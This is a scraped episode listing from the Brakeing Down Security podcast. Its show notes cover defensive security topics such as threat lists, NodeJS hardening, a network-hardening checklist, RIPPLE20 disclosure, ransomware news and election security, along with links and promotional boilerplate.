In your environment, you deal with threats from all over the world. Many groups out there pool resources to help everyone deal with those #threats. Some come in the form of threat #intelligence from various intelligence companies, like #Carbon #Black, #FireEye, and #Crowdstrike. But what if your company cannot afford such products, or are not ready to engage those types of companies, and still need need protections? Never fear, there are open source options available (see show notes below). These products aren't perfect, but they will provide a modicum of protection from 'known' bad actors, SSH trolls, etc. We discuss some of the issues using them, discuss how to use them in your #environment. Lastly, we discuss #mentorship. Having a good mentor/mentee relationship can be mutally beneficial to both parties. We discuss what it takes to be a good mentee, as well as a good mentor... RSS: www.brakeingsecurity.com/rss Direct Download: http://traffic.libsyn.com/brakeingsecurity/2017-002-mentoring_threat_lists.mp3 iTunes: https://itunes.apple.com/us/podcast/2017-002-threat-lists-ids/id799131292?i=1000380246554&mt=2 YouTube: https://www.youtube.com/watch?v=oHNrINl1oZE
---------- HITB announcement: “Tickets are on sale, And entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/ --------- Join our #Slack Channel! Sign up at https://brakesec.signup.team
---------- Show Notes: HANGOUTS: https://hangouts.google.com/call/w7rkkde5yrew5nm4n7bfw4wfjme
2017-002-Threat Lists, IDS/IPS rulesets, and infosec mentoring
| |||||||||||||||||||||||||||||||||
| 18 Dec 2018 | 2018-044: Mike Samuels discusses NodeJS hardening initiatives | 00:56:11 | |||||||||||||||||||||||||||||||
Mike Samuels https://github.com/mikesamuel/attack-review-testbed https://nodejs-security-wg.slack.com/
Hardening NodeJS
Speaking engagement talks: A Node.js Security Roadmap at JSConf.eu - https://www.youtube.com/watch?v=1Gun2lRb5Gw Improving Security by Improving the Framework @ Node Summit - https://vimeo.com/287516009 Achieving Secure Software through Redesign at Nordic.js - https://www.facebook.com/nordicjs/videos/232944327398936/?t=1781
What is a package: (holy hell, why is this so complicated?)
A package is any of:
https://medium.com/@jsoverson/exploiting-developer-infrastructure-is-insanely-easy-9849937e81d4
https://blog.risingstack.com/node-js-security-checklist/
| |||||||||||||||||||||||||||||||||
| 06 Jun 2018 | 2018-019-50 good ways to protect your network, brakesec summer reading program | 00:47:22 | |||||||||||||||||||||||||||||||
Ms. Berlin’s mega tweet on protecting your network
https://twitter.com/InfoSystir/status/1000109571598364672
Utica College CYB617 I tweeted “utica university” many pardons
Mr. Childress’ high school class Laurens, South Carolina
Probably spent as much as a daily coffee at Starbucks… makes all the difference.
CTF Club, and book club (summer reading series)
Patreon SeaSec East
Showmecon Area41con bsidescleveland
Here are 50 FREE things you can do to improve the security of most environments:
Segmentation/Networking: Access control lists are your friend (deny all first) Disable ports that are unused, & setup port security DMZ behind separate firewall Egress Filtering (should be just as strict as Ingress) Geoblocking Segment with Vlans Restrict access to backups Role based servers only! DNS servers/DCs are just that Network device backups
Windows: AD delegation of rights Best practice GPO (NIST GPO templates) Disable LLMNR/NetBios EMET (when OSes prior to 10 are present) Get rid of open shares MSBSA WSUS ** run as a standard user ** no ‘localadmin’
Endpoints: App Whitelisting Block browsing from servers. Not all machines need internet access Change ilo settings/passwords Use Bitlocker/encryption Patch *nix boxes Remove unneeded software Upgrade firmware
MFA/Auth: Diff. local admin passwords (LAPS) https://www.microsoft.com/en-us/download/details.aspx?id=46899 Setup centralized logins for network devices. Use TACACS+ or radius Least privileges EVERYWHERE Separation of rights - Domain Admin use should be sparse & audited
Logging Monitoring: Force advanced file auditing (ransomware detection) Log successful and unsuccessful logins - Windows/Linux logging cheatsheets
Web: Fail2ban For the love of god implement TLS 1.2/3 URLscan Ensure web logins use HTTPS Mod security
Other: Block Dns zone transfers Close open mail relays Disable telnet & other insecure protocols or alert on use DNS servers should not be openly recursive Don't forget your printers (saved creds aren't good) Locate and destroy plain text passwords No open wi-fi, use WPA2 + AES Password safes
IR: Incident Response drills Incident Response Runbook & Bugout bag Incident Response tabletops
Purple Team: Internal & OSINT honeypots User Education exercises MITRE ATT&CK Matrix is your friend Vulnerability Scanner
Join our #Slack Channel! Email us at bds.podcast@gmail.com or DM us on Twitter @brakesec #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 16 Jul 2020 | 2020-027-RIPPLE20 Report, supply chain security, responsible disclosure, software development, and vendor care. | 00:48:34 | |||||||||||||||||||||||||||||||
Whitepaper: https://www.jsof-tech.com/ripple20/ [blog] Build your own custom TCP/IP stack: https://www.saminiir.com/lets-code-tcp-ip-stack-1-ethernet-arp/ Another custom TCP/IP stack: https://github.com/tass-belgium/picotcp RIPPLE 20 Whitepaper: https://drive.google.com/file/d/1d3NNVCRPVFk0-V0HUO5CxWWVn9pYIvmF/view?usp=sharing Agenda: Part 1: Background on the report Why is it called RIPPLE20? What’s the RIPPLE about? Communications with Treck (and it’s Japanese counterpart) Were you surprised about the reaction? Positive or negative? Types of systems affected? IoT Embedded systems SCADA What precipitated the research? What difficulties did you face in finding these vulns? Deadlines? What tools were used for analysis? (I think you mentioned Forescout --brbr) What kind of extensibility are we talking about? TCP sizes? What did JSOF gain by doing this? What were the initial benefits of using the TCP/IP stack? Speed? Size? Did Treck give you access to source? Any specific requirements set by Treck? Any items that were off-limits? Updates since the report was released? Are your vulns such that they can be detected online? Part 2: Supply chain issues What should companies do when they don’t know what’s in their own tech stack?
Software bill of materials: https://en.wikipedia.org/wiki/Software_bill_of_materials PicoTCP link above does not release all code, because they use binary blobs that make proper code review next to impossible “Unfortunately we can't release all the code, a.o. because some parts depend on code or binaries that aren't GPL compatible, some parts were developed under a commercial contract, and some consist of very rough proof-of-concept code. If you want to know more about the availability under the commercial license, or the possibility of using our expert services for porting or driver development, feel free to contact us at picotcp@altran.com.” BLoBs = https://en.wikipedia.org/wiki/Proprietary_device_driver Vendor Contact How many organizations are affected by these vulnerabilities? Are some devices and systems more vulnerable than others? How many are you still investigating to see if they are affected?
What’s the initial email look like when you tell a company “you’re vulnerable to X”? Who are you dealing with initially? What is your delivery when you’re routed to non-technical people? How did you tailor your initial response when you learned of the position of the person? Lessons Learned: Any additional tooling that you’d have used? BlackHat talk: 05 August What should companies do to reduce or mitigate the chances of the types of vulnerabilities found by your org?
https://www.supplychainservices.com/blog/major-security-risks-windows-embedded-users
Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec
| |||||||||||||||||||||||||||||||||
| 24 May 2022 | news, infosystir's talk at RSA, conti has an 'image' problem | 00:45:42 | |||||||||||||||||||||||||||||||
https://www.securityweek.com/conti-ransomware-operation-shut-down-after-brand-becomes-toxic https://portswigger.net/daily-swig/chicago-public-schools-data-breach-blamed-on-ransomware-attack-on-supplier https://www.helpnetsecurity.com/2022/05/23/protect-kubernetes-cluster/
https://www.darkreading.com/application-security/6-scary-tactics-used-in-mobile-app-attacks
| |||||||||||||||||||||||||||||||||
| 12 Jan 2017 | 2017-001: A New Year, malware legislation, and a new cast member! | 00:43:44 | |||||||||||||||||||||||||||||||
We start Brakeing Down Security with a huge surprise! A 3rd member of the podcast! Amanda #Berlin (@infosystir) joins us this year to help us educate people on #security topics. During the year, she'll be getting us some audio from various conventions and giving us her perspective working as an #MSSP, as well as a blue team (defender). We start out talking about new #California #legislation about making #malware illegal. What are politicians in California thinking? We work through that and try to find some understanding. With all the various secure messaging systems out there, we discuss how why secure messaging systems fail so poorly with regards to #interoperability and the difficulties in getting average non-infosec people to adopt one. We also discuss #Perfect #Foward #Security and how it prevents people from decrypting old messages, even if the key is compromised. ---------- HITB announcement: “Tickets are on sale, And entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/ --------- Join our #Slack Channel! Sign up at https://brakesec.signup.team
---Show Notes--- News story: http://www.latimes.com/politics/la-pol-sac-crime-ransomware-bill-20160712-snap-story.html
“If this legislation gives prosecutors the tools that they didn’t have before, where are the cases that they have lost because they didn’t have these tools?” said Brandon Perry, a senior consultant for NTT Com Security. “Authorities are focused on prosecuting criminals that they can’t even find, as opposed to educating the victims to prevent this from happening again and again.”
Ransomware won’t infect you if you watch training videos: http://thehackernews.com/2017/01/decrypt-ransomware-files.html
Secure messaging - stuck in an Apple ecosystem Too many, no interoperability Signal, Whisper, Wickr, Wire, WhatsApp, FB messenger I uninstalled Signal… can’t convince people to adopt something if everyone cannot message one another --BrBr
OpenPGP is ‘dangerous’ http://arstechnica.com/information-technology/2016/12/signal-does-not-replace-pgp/ Forward Secrecy - https://en.wikipedia.org/wiki/Forward_secrecy “A public-key system has the property of forward secrecy if it generates one random secret key per session to complete a key agreement, without using a deterministic algorithm.” (input given gives the same output every time) Perfect Forward Secrecy - “In cryptography, forward secrecy (FS; also known as perfect forward secrecy[1]) is a property of secure communication protocols in which compromise of long-term keys does not compromise past session keys.
Ms. Amanda’s pentest homework: “https://docs.google.com/document/d/17NJPXpqB5Upma2-6Hu5svBxd8PH0Ex7VgCvRUhiUNk8/edit” | |||||||||||||||||||||||||||||||||
| 30 Jun 2017 | 2017-SPECIAL- Michael Gough and Brian Boettcher discuss specific ransomware | 00:19:26 | |||||||||||||||||||||||||||||||
Due to popular demand, we are adding the extra content from last week's show as a standalone podcast.
Michael Gough (@hackerHurricane) and Mr. Boettcher (BrakeSec Co-Host, and @boettcherpwned) sit down and discuss the popularity of ransomware as a topic They discuss what email attachments to block, how to test your own email gateway, and what controls you should implement to help defend against the #petya #notpetya ransomware. | |||||||||||||||||||||||||||||||||
| 14 Mar 2016 | 2016-011-Hector Monsegur, deserialization, and bug bounties | 01:12:26 | |||||||||||||||||||||||||||||||
Download Here: http://traffic.libsyn.com/brakeingsecurity/2016-011-Hector_Monsegur-bug_bounties-serialization.mp3 iTunes Direct Link: https://itunes.apple.com/us/podcast/2016-011-hector-monsegur-serialization/id799131292?i=364768504&mt=2 Hector Monsegur has had a colorful history. A reformed black hat who went by the name 'Sabu' when he was involved in the hacker collectives "Lulzsec" and "Anonymous", he turned state's evidence for the FBI, working to stop further hacking attempts by the same people he was working with. https://en.wikipedia.org/wiki/Hector_Monsegur This week, we got to sit down with Hector, to find out what he's been doing in the last few years. Obviously, a regular job in the security realm for a large company is not possible for someone with a colorful past that Mr. Monsegur has. So we discuss some of the methods that he's used to make ends meet. Which brings us to the topic of bug bounties. Do they accomplish what they set out to do? Are they worth the effort companies put into them? And how do you keep bounty hunters from going rogue and using vulnerabilities found against a company on the side? In an effort to satisfy my own curiosity, I asked Hector if he could explain what a 'deserialization' vulnerability is, and how it can be used in applications. They are different than your run of the mills, every day variety OWASP error, but this vulnerability can totally ruin your day... Finally, we ask Hector some advice for that 'proto black hat' who is wanting to head down the road that Hector went. The answer will surprise you... We hope you enjoy this most interesting interview with a enigmatic and controversial person, and hope that the information we provide gives another point of view into the mind of a reformed "black hat" hacker...
Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security using Patreon: https://www.patreon.com/bds_podcast RSS FEED: http://www.brakeingsecurity.com/rss On #Twitter: @brakesec @boettcherpwned @bryanbrake #Facebook: https://www.facebook.com/BrakeingDownSec/ #Tumblr: http://brakeingdownsecurity.tumblr.com/ Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969 Player.FM : https://player.fm/series/brakeing-down-security-podcast Stitcher Network: http://www.stitcher.com/s?fid= TuneIn Radio App: http://tunein.com/radio/ #infosec, #blackhat, hector #monsegur, #hacker, #anonymous, #lulzsec, #FBI, #Sabu, #deserialization, #bug #bounties, #hackerone, #bugcrowd, #podcast, #de-serialization, #penetration tests, #social #engineering, #CISSP | |||||||||||||||||||||||||||||||||
| 30 Jul 2022 | Tanya Janca, Securing APIs, finding Security Champions, and accepting Risk | 00:41:37 | |||||||||||||||||||||||||||||||
Tanya Janca, also known as @SheHacksPurple, is the best-selling author of ‘Alice and Bob Learn Application Security’. She is also the founder of We Hack Purple, an online learning academy, community and podcast that revolves around teaching everyone to create secure software. Tanya has been coding and working in IT for over twenty years, won countless awards, and has been everywhere from startups to public service to tech giants (Microsoft, Adobe, & Nokia). She has worn many hats; startup founder, pentester, CISO, AppSec Engineer, and software developer. She is an award-winning public speaker, active blogger & streamer and has delivered hundreds of talks and trainings on 6 continents. She values diversity, inclusion, and kindness, which shines through in her countless initiatives.
BrakeSec is:
| |||||||||||||||||||||||||||||||||
| 24 Feb 2014 | Episode 6 - Malware Interview with Michael Gough (Part 2) | 00:45:20 | |||||||||||||||||||||||||||||||
This is part 2 of our Interview with Malware researcher Michael Gough. We talk about mobile device malware, and how the Sniper Forensic Toolkit, differs from Tripwire.
Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com) "Infectedpc_primary.jpg is from bugsrepair.com | |||||||||||||||||||||||||||||||||
| 01 Nov 2016 | 2016-043: BSIMMv7, a teachable moment, and our new Slack Channel! | 01:14:10 | |||||||||||||||||||||||||||||||
**Brakeing Down Security has a Slack channel now... just go to https://brakesec.signup.team and follow the instructions to have the bot add you to our show's official channel.** Every year, organizations come out with industry reports that show how well or, more often than not, how poorly we are doing. We always even reviewing the BSIMM report, because it's an unvarnished, and a good measure of a good number of industry verticals, like finance, manufacturing, cloud, and even companies that make IoT devices. Join Mr. Boettcher and I this week as we go over the findings of the report, discuss what got better, what still sucks, and what shouldn't we fault companies for not having. We also have a teachable moment when I discuss a security paux fas that happened to me (Bryan) recently regarding an email account and my Skype. 2 factor authentication is your friend, and if it's available, use it. Mr. Boettcher discusses some recent malware that has reared it's ugly head, and how to detect it. Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-043-BSIMMv7.mp3 iTunes: https://itunes.apple.com/us/podcast/2016-043-bsimmv7-teachable/id799131292?i=1000377394890&mt=2 YouTube: https://www.youtube.com/watch?v=I3FLSLSSb_Y
#RSS: http://www.brakeingsecurity.com/rss #Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969 #SoundCloud: https://www.soundcloud.com/bryan-brake Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast #Twitter: @brakesec @boettcherpwned @bryanbrake #Facebook: https://www.facebook.com/BrakeingDownSec/ #Tumblr: http://brakeingdownsecurity.tumblr.com/ #Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr #TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
| |||||||||||||||||||||||||||||||||
| 06 Jul 2015 | 2015-029: Big Brown cloud honeyblog with @theroxyd | 00:49:00 | |||||||||||||||||||||||||||||||
Roxy, who we interviewed a few months ago on our podcast about hackerspaces, is back with us this week to discuss a project she is working on, called 'Big Brown Cloud'. If you've ever wanted to setup your own fake blog and send people to it to gain information on possible attacks, you've come to the right place.
We also get an update on the hackerspace that Jarrod, Sean, and Roxy were getting setup a few months ago. They've come a long way, and they are about to move into their new facility https://thelab.ms/ | |||||||||||||||||||||||||||||||||
| 15 Dec 2014 | Tyler Hudak (@secshoggoth) Discusses incident respose, and DIY malware research | 00:41:44 | |||||||||||||||||||||||||||||||
This week, Tyler gave us a great deal of information on where to start if you wanted to become a malware researcher. He also gave us websites where you can get malware and ways to analyze it. We asked Tyler what blue teams can do when they are infected, and he gave us some excellent advice... I also recite some prose from a classic horror author, so come for the malware, stay for the prose! :) ***NOTE: I guess now would be a good time to mention that many of the links below have unsafe software and actual malware payloads, so use with extreme caution. Especially do not download anything from these sites unless it's in a VM that is not on your companies assets.*** http://www.hopperapp.com/ - Disassemble OSA binaries http://en.wikibooks.org/wiki/X86_Disassembly/Disassemblers_and_Decompilers - other Disassemblers http://vxheaven.org/ - Virus Heaven http://www.malwaredomainlist.com/ - Find websites serving malware http://oc.gtisc.gatech.edu:8080/ - Georgia Tech malware repository Sandboxie - http://www.sandboxie.com/ KoreLogic - http://www.korelogic.com/ (lots of great tools here) http://secshoggoth.blogspot.com/ - Tyler's Blog | |||||||||||||||||||||||||||||||||
| 17 Jul 2016 | 2016-028: Cheryl Biswas discusses TiaraCon, Women in Infosec, and SCADA headaches | 01:00:24 | |||||||||||||||||||||||||||||||
Long time listeners will remember Ms. Cheryl #Biswas as one of the triumvirate we had on to discuss #mainframes and mainframe #security. (http://traffic.libsyn.com/brakeingsecurity/2016-008-mainframe_secruity.mp3) I was interested in the goings on at BlackHat/DefCon/BsidesLV, and heard about #TiaraCon (@tiarac0n on Twitter). I went to find someone involved to understand what it was all about, and Ms. Cheryl reached out. She's an #organizer and was more than happy to sit down with me to understand why it was started. This is its inaugural year, and they already have some excellent schwag and sponsors. This is not just an event for ladies, but a way of #empowering #women, creating #mentorship opportunities, and assistance for people moving into the #infosec industry. Also, since Ms. Cheryl's loves discussing #ICS and #SCADA problems and headaches, we got into the headaches, #challenges, and maybe some 'logical' solutions to fixing SCADA vulns... but does the logical approach work in a business sense? TiaraCon official site: http://tiaracon.org/ TiaraCon Dates: Thursday Aug 4 - Friday Aug 5
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-028-Cheryl_Biswas_Tiaracon_ICSSCADA_headaches.mp3 iTunes: https://itunes.apple.com/us/podcast/2016-028-cheryl-biswas-discusses/id799131292?i=1000372642921&mt=2 Youtube: https://www.youtube.com/watch?v=vsolDjsz5M4
SoundCloud: https://www.soundcloud.com/bryan-brake Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security #Podcast on #Patreon: https://www.patreon.com/bds_podcast #Twitter: @brakesec @boettcherpwned @bryanbrake #Facebook: https://www.facebook.com/BrakeingDownSec/ #Tumblr: http://brakeingdownsecurity.tumblr.com/ #Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr #TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582 | |||||||||||||||||||||||||||||||||
| 17 Aug 2018 | 2018-029-postsummercamp-future_record_breached-vulns_nofix | 00:55:31 | |||||||||||||||||||||||||||||||
Post-Hacker Summercamp
IppSec Walkthroughs Brakesec Derbycon ticket CTF -
Drama - (hotel room search gate) AirconditionerGate Personal privacy Ask for ID Call the front desk Use the deadbolt - can be bypassed Plug the peephole with TP Hotel rooms aren’t secure (neither are the safes) Probably the most hostile environment infosec people go into to try and be secure/private
https://www.informationsecuritybuzz.com/expert-comments/over-146-billion-records/ Based on study by Juniper Research
https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 04 Dec 2019 | 2019-043-Bea Hughes, dealing with realistic threats in your org | 01:10:59 | |||||||||||||||||||||||||||||||
Realistic Threats Nation states aren’t after you https://twitter.com/beajammingh/status/1191884466752385025 https://twitter.com/beajammingh/status/1198671660150226946 https://twitter.com/beajammingh/status/1198671952824565762
https://www.leviathansecurity.com/blog/the-calculus-of-threat-modeling
What are credible threats? Malicious insiders - Non-malicious insiders - https://www.scmagazine.com/home/security-news/not-every-insider-threat-is-malicious-but-all-are-dangerous/ Education issue? Is there such a thing as ‘non-malicious’ or is this just bunk?
Real threats https://resources.infosecinstitute.com/5-new-threats-every-organization-prepared-2018/ CIO magazine threats -- buzzword threats (we should totally containerize all the things) Vulns that have names (blue team is stuck dealing with ‘theoretical’ issues e.g. SPECTRE/MELTDOWN) Lack of well-priced training? Dev Training? Security Training?
Better management communication will reduce threats Building trust so they don’t freak when ‘$insert_named_vuln’ shows up Gotta frame it to business needs “Everyone is vulnerable” - keep FUD to a minimum, don’t exaggerate. Know your industry’s threats (phishing, money transfer fraud, malware Patreon donor: Michael K. $10 patron! Layer8conf - https://www.workshopcon.com/events https://layer8conference.com/
Regarding diversity scholarships, it's being worked on and the number of available spots will highly depend on the number of Sponsorships the conference secures. As a side note WorkshopCon will sponsor a number of Layer8 conference tickets if people follow @WorkshopCon on Twitter and tweet to us why they are interested in Social Engineering and OSINT topics with hashtag #sendMeToLayer8. We will select folks from those tweets with the emphasis being on folks coming from underrepresented or minority groups. In terms of sponsorship information for Layer8, Patrick wants people to send an email to sponsors@layer8conference.com Please let us know if you have any other questions, and thank you so much for giving us a hand spreading the word!!!
Saturday June 6, 2020, RI Convention Center
https://www.dianainitiative.org/ https://twitter.com/DianaInitiative
Conference in Las Vegas (Aug 6-7, 2020) (Thu & Fri) Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec | |||||||||||||||||||||||||||||||||
| 02 Nov 2020 | 2020-040- Jeremy Mio, State of Ohio Election Security | 01:03:35 | |||||||||||||||||||||||||||||||
Previous Election Security podcast: https://brakeingsecurity.com/2018-042-election-security-processes-in-the-state-of-ohio
Jeremy Mio (@cyborg00101)
https://itsecurity.cuyahogacounty.us/
(added cybersecurity Directives during 2018 last podcast -jmio)
Einstein (US-CERT program) - Wikipedia Albert Program (added new cybersecurity Directives since last podcast -jmio)
LaRose issues directive to set a new standard for election security in 2020 (added -jmio)
Vuln disclosure policy: Vulnerability Disclosure Policy - Ohio Secretary of State (ohiosos.gov) Did anyone think to pentest the vuln acceptance form? (lol, layers in layers --brbr)
Ohio to ramp up election security with new federal funds | TheHill “Ohio has taken steps to combat those types of threats. In October, Ohio Gov. Mike DeWine (R) signed into law a measure that required post-election audits to ensure the accuracy of the vote count, and created a “civilian cyber security reserve” to defend against potential cyberattacks.
“His [secretary of state LaRose] first-of-its-kind Vulnerability Disclosure Policy invites Ohio’s crop of “white-hat” hackers — the good guys, opposite malevolent “black-hat” hackers — to break into the state’s election system, find bugs and report them so officials can ensure they’re fixed by Election Day. There are some strings attached: White hats aren’t allowed to phish for information or tamper with electronic county voter registration systems, and actual voting machines — legally barred from being connected to the internet — are off-limits. If they do find sensitive information, they’re expected to report it.” How did the threat model shift from the last time we talked? What has changed in terms of organization and threats? You mentioned 4-5 different voting regions last time, all with different levels of technology. Any updates on the tech? How did covid change how voting occurred? How have you leveraged the Elections Infrastructure ISAC (EI-ISAC) in passing along threats and sharing information?
Has insider threat been part of your threat model and what has your group done to minimize the chances? (why does it feel like the Oscars has more scrutiny in terms of voting security than the US democratic process? --brbr) What does physical security look like in terms of people going to the polls? (wasn’t sure if that was something in your purview --brbr) (this is not (Election Board and Sheriff), but can discuss high level -jmio) Using hardware domain block services? Malicious Domain Blocking and Reporting (MDBR) Newest Service for U.S. SLTTs (cisecurity.org) LaRose Setting New Standard For Election Security - Ohio Secretary of State (ohiosos.gov) 88 election districts will have access to domain blocking tech (mandated to start by 28 August 2020), cybersecurity experts. Can you give us an update on any of what was mentioned in the press release
Background checks | |||||||||||||||||||||||||||||||||
| 03 Feb 2021 | 2021-004-Danny Akacki talks about Mergers and Acquisitions - Part 2 | 00:47:45 | |||||||||||||||||||||||||||||||
Discussion on Mergers and acquisitions processes On being acquired, but also if you’re acquiring a company Best Practices Best Practices of Mergers and Acquisitions (workforce.com) The Role of Information Security in a Merger/Acquisition (bankinfosecurity.com) Security Considerations in the Merger/Acquisition Process (sans.org) The 10 steps to successful M&A integration | Bain & Company Savvy Hackers Use Spearphishing to steal Wall Street M&A info (knowbe4.com) “We’ve been acquired by X!” First thing people think “oh no, what’s gonna happen to me.” Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #AmazonMusic: https://brakesec.com/amazonmusic #Brakesec Store!: https://brakesec.com/teepub #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec
| |||||||||||||||||||||||||||||||||
| 04 Dec 2015 | 2015-049-Can you achieve Security Through Obscurity? | 00:42:19 | |||||||||||||||||||||||||||||||
That's the question many think is an automatic 'yes'. Whether your Httpd is running on port 82, or maybe your fancy #wordpress #module needs some cover because the code quality is just a little lower than where it should be, and you need to cover up some cruft This week, Mr. Boettcher and I discuss reasons for obscuring for the sake of #security, when it's a good idea, and when you shouldn't #obscure anything (hint: using #ROT-14, for example) #encryption #infosec Show Notes: https://docs.google.com/document/d/1PioC2hnQHhm5Xd1SCT4ewvZmZiLcE5pGQuif4Tuk_zE/edit?usp=sharing Direct Link: http://traffic.libsyn.com/brakeingsecurity/2015-049-Security_by_Obscurity.mp3 Mr. Boettcher's Twitter: http://www.twitter.com/boettcherpwned Bryan's Twitter: http://www.twitter.com/bryanbrake TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/ BrakeSec Podcast Twitter: http://www.twitter.com/brakesec Join our Patreon!: https://www.patreon.com/bds_podcast Comments, Questions, Feedback: bds.podcast@gmail.com | |||||||||||||||||||||||||||||||||
| 20 Jun 2016 | 2016-024: Kim Green, on CISOaaS, the Redskins Laptop, and HIPAA | 01:13:20 | |||||||||||||||||||||||||||||||
